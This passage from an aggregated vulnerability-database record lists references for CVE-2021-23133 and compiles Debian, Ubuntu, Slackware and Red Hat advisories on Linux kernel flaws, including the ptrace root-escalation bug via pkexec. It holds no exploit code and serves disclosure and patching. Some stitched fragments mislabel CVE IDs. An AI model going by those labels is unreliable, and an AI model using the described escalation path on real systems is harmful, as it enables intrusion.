        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36331"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31535"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36330"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20266"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36332"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3481"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35523"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20197"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3796"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/362.html"
      },
      {
        "trust": 0.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/paeq3h6hkno6kucgrzvysfsageux23jl/"
      },
      {
        "trust": 0.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/cux2ca63453g34c6kyvbljxjxearzi2x/"
      },
      {
        "trust": 0.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/xzashzvcofj4vu2i3bn5w5ephwjq7qwx/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://seclists.org/oss-sec/2021/q2/110"
      },
      {
        "trust": 0.1,
        "url": "https://security.archlinux.org/cve-2021-23133"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1010.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1011.11"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1011.12"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-22.23"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.8/5.8.0-1033.34~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.8/5.8.0-1036.38~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1029.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1035.37"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-59.66"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25671"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1038.40"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1036.38"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-59.66~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1030.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.8/5.8.0-1035.37~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.8/5.8.0-1038.40~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4999-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1033.34"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3600"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1075.83"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5003-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1103.116"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1022.26"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1106.113"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1118.131"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1089.94"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-147.151"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1106.115"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5000-2"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5000-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1041.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4997-2"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4140"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43527"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3712"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:5137"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4356"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33194"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4627"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-23133"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163262"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-23133"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-23133"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163262"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-23133"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-22T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-23133"
      },
      {
        "date": "2021-06-23T15:33:13",
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "date": "2021-06-23T15:35:21",
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "date": "2021-06-23T15:48:14",
        "db": "PACKETSTORM",
        "id": "163262"
      },
      {
        "date": "2021-06-27T12:22:22",
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "date": "2021-06-28T16:22:26",
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "date": "2021-11-10T17:10:23",
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "date": "2021-12-15T15:27:05",
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "date": "2021-11-10T17:04:39",
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "date": "2021-11-15T17:25:56",
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "date": "2021-04-22T18:15:08.123000",
        "db": "NVD",
        "id": "CVE-2021-23133"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-05-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-23133"
      },
      {
        "date": "2023-11-07T03:30:47.290000",
        "db": "NVD",
        "id": "CVE-2021-23133"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163262"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      }
    ],
    "trust": 0.5
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu Security Notice USN-4997-1",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163249"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163262"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      }
    ],
    "trust": 0.5
  }
}

var-201907-1641
Vulnerability from variot

In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in some environments. Linux Kernel Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could use this to expose sensitive information. (CVE-2019-10126)

Andrei Vlad Lutas and Dan Lutas discovered that some x86 processors incorrectly handle SWAPGS instructions during speculative execution. 8) - aarch64, noarch, ppc64le, s390x, x86_64

For the oldstable distribution (stretch), this problem has been fixed in version 4.9.168-1+deb9u4.

For the stable distribution (buster), this problem has been fixed in version 4.19.37-5+deb10u1. This update includes as well a patch for a regression introduced by the original fix for CVE-2019-11478 (#930904).

For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl0zJkBfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0SvYw/8CJrPtf7juWLaRa3m/LvFewU+BppoJqNaVUbQNXVT90PgH/zDWVbpkJ4g Tr4MW6tzRKnAfUS+jObsnR9jGo871ZZ2wtlcM3W0bMnCwK6tPnTGiqTauflPXf2X KW8V3YLI6W6MxPlSLa2EQkDJ/RfTke4SwQDFDX0lzYjC5LwCwDwKIWBC6P5xBg6w yxNh6PHv9++ES8SKYpU3oMlWG43fJZJ8Oyy7Wdk0H84Qcjxb8FDP2iWyRf0Mvb+5 1uFosUswfN89imMrIFdYhv/z7CYFeHgYA0lPIvQ1gpNWOflrGqoMYL1Pys95mVCV RdRBtWy2atPHos6HEgw85cxaTS9Ss9FYB0sL+QCqIdw5ZwTt5+QR+JLNvJ53VKEm BxE5TncjlEAOc9t74xti/vBW2eCjp7IPaMP8X8eqWKiaMGJBlwaJEPUSmL4SiZo+ cW1plAYxc0CYq4lDWo3fcR7tBMQfp1ffDYUNn3DXvHChF1Ebi3zIdGl+oSeNP8hW OuaH6/P+qko0S/TNXAK5uaekrzjYv2pWm6xoM10fMVXiT8GiyjIGmSTTu6WvaiCA ITdy+o/jAfBiQsdFer2MYUna8QxjOy3XClKsy9+yjrj8ciekC4nOPHdz3/CYfOha cojPRl2Qd2KSWfEUoze2IqPrr3iAnKFKH6a+WU1XQZuo6r3uo0Q= =fTIm -----END PGP SIGNATURE----- . 8) - x86_64

  1. ========================================================================= Ubuntu Security Notice USN-4117-1 September 02, 2019

linux-aws vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 19.04

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-aws: Linux kernel for Amazon Web Services (AWS) systems

Details:

It was discovered that a heap buffer overflow existed in the Marvell Wireless LAN device driver for the Linux kernel. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-10126)

Amit Klein and Benny Pinkas discovered that the Linux kernel did not sufficiently randomize IP ID values generated for connectionless networking protocols. A remote attacker could use this to track particular Linux devices. (CVE-2019-10638)

It was discovered that a NULL pointer dereference vulnerability existed in the Near-field communication (NFC) implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-12984)

Jann Horn discovered a use-after-free vulnerability in the Linux kernel when accessing LDT entries in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-13233)

Jann Horn discovered that the ptrace implementation in the Linux kernel did not properly record credentials in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. (CVE-2019-13272)

It was discovered that the floppy driver in the Linux kernel did not properly validate meta data, leading to a buffer overread. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14283)

It was discovered that the floppy driver in the Linux kernel did not properly validate ioctl() calls, leading to a division-by-zero. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14284)

It was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-3846)

Jason Wang discovered that an infinite loop vulnerability existed in the virtio net driver in the Linux kernel. A local attacker in a guest VM could possibly use this to cause a denial of service in the host system. (CVE-2019-3900)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 19.04: linux-image-5.0.0-1014-aws 5.0.0-1014.16 linux-image-aws 5.0.0.1014.15

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4117-1 CVE-2019-10126, CVE-2019-10638, CVE-2019-12984, CVE-2019-13233, CVE-2019-13272, CVE-2019-14283, CVE-2019-14284, CVE-2019-3846, CVE-2019-3900

Package Information: https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1014.16 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

[slackware-security] Slackware 14.2 kernel (SSA:2019-202-01)

New kernel packages are available for Slackware 14.2 to fix security issues.

Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/linux-4.4.182/: Upgraded. These updates fix various bugs and many minor security issues. Be sure to upgrade your initrd after upgrading the kernel packages. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 4.4.183: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11599 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3892 Fixed in 4.4.185: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13272 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16597 Fixed in 4.4.186: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10126 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3846 ( Security fix *) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-firmware-20190717_bf13a71-noarch-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-generic-4.4.186-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-generic-smp-4.4.186_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-headers-4.4.186_smp-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-huge-4.4.186-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-huge-smp-4.4.186_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-modules-4.4.186-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-modules-smp-4.4.186_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-source-4.4.186_smp-noarch-1.txz

Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-firmware-20190717_bf13a71-noarch-1.txz ftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-generic-4.4.186-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-headers-4.4.186-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-huge-4.4.186-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-modules-4.4.186-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-source-4.4.186-noarch-1.txz

MD5 signatures: +-------------+

Slackware 14.2 packages: 01138ebc336b6e6d692697570bb32920 kernel-firmware-20190717_bf13a71-noarch-1.txz d7e0b9ffdc4265b45d4de39d49d52616 kernel-generic-4.4.186-i586-1.txz c1131f8dd16f7113cc8b1e14c402a9b7 kernel-generic-smp-4.4.186_smp-i686-1.txz ca4630c4ee7056c51f3262152bfb9213 kernel-headers-4.4.186_smp-x86-1.txz 61b95e68756fe9741ddbdc52f397fe49 kernel-huge-4.4.186-i586-1.txz ff981138513726a502d57f9e2aecad36 kernel-huge-smp-4.4.186_smp-i686-1.txz ca8f6fb5fc378d16e5afcee31dd032dc kernel-modules-4.4.186-i586-1.txz 25fc2f1280f1a706705ef4535f4efd1c kernel-modules-smp-4.4.186_smp-i686-1.txz 2d299723d6f910df1e8c21d18070b9ef kernel-source-4.4.186_smp-noarch-1.txz

Slackware x86_64 14.2 packages: 01138ebc336b6e6d692697570bb32920 kernel-firmware-20190717_bf13a71-noarch-1.txz 80caffb238022225afe93b957fecbff2 kernel-generic-4.4.186-x86_64-1.txz f72e4543e3489d18604f33a901e04551 kernel-headers-4.4.186-x86-1.txz 0765db332a94cfedcacd987871903e56 kernel-huge-4.4.186-x86_64-1.txz 8d565a7b223b9444731796e6147116eb kernel-modules-4.4.186-x86_64-1.txz 0254fdbb4430362ea373b47584d8eb30 kernel-source-4.4.186-noarch-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg kernel-*.txz

If you are using an initrd, you'll need to rebuild it.

For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.186-smp | bash

For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.186 | bash

Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 4.4.186-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 4.4.186 as the version.

If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.

If using LILO: By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader.

If using elilo: Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel-alt security, bug fix, and enhancement update Advisory ID: RHSA-2019:2809-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:2809 Issue date: 2019-09-20 CVE Names: CVE-2019-5489 CVE-2019-6974 CVE-2019-13272 ==================================================================== 1. Summary:

An update for kernel-alt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, noarch, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, noarch, ppc64le

  1. Description:

The kernel-alt packages provide the Linux kernel version 4.x.

Security Fix(es):

  • Kernel: page cache side channel attacks (CVE-2019-5489)

  • Kernel: KVM: potential use-after-free via kvm_ioctl_create_device() (CVE-2019-6974)

  • kernel: broken permission and object lifetime handling for PTRACE_TRACEME (CVE-2019-13272)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • [kernel-alt]: BUG: unable to handle kernel NULL pointer IP: crypto_remove_spawns+0x118/0x2e0 (BZ#1536967)

  • [HPE Apache] update ssif max_xmit_msg_size limit for multi-part messages (BZ#1610534)

  • RHEL-Alt-7.6 - powerpc/pseries: Fix unitialized timer reset on migration / powerpc/pseries/mobility: Extend start/stop topology update scope (LPM) (BZ#1673613)

  • RHEL-Alt-7.6 - s390: sha3_generic module fails and triggers panic when in FIPS mode (BZ#1673979)

